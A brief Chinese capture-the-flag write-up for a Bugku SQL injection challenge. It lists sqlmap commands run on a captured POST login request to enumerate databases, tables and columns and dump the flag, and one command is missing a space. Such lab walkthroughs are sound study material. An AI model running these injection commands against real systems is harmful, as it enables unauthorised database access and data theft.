打开http://123.206.87.240:9001/sql/后是个登陆界面
查看源代码
于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包
命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名
后续在保表、列以及数据
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1 --tables//爆表名
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1 -T flag1 --columns// 爆列名字
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1-T flag1 -C flag1 --dump//爆flag
最后得到flag!!!
相关文章: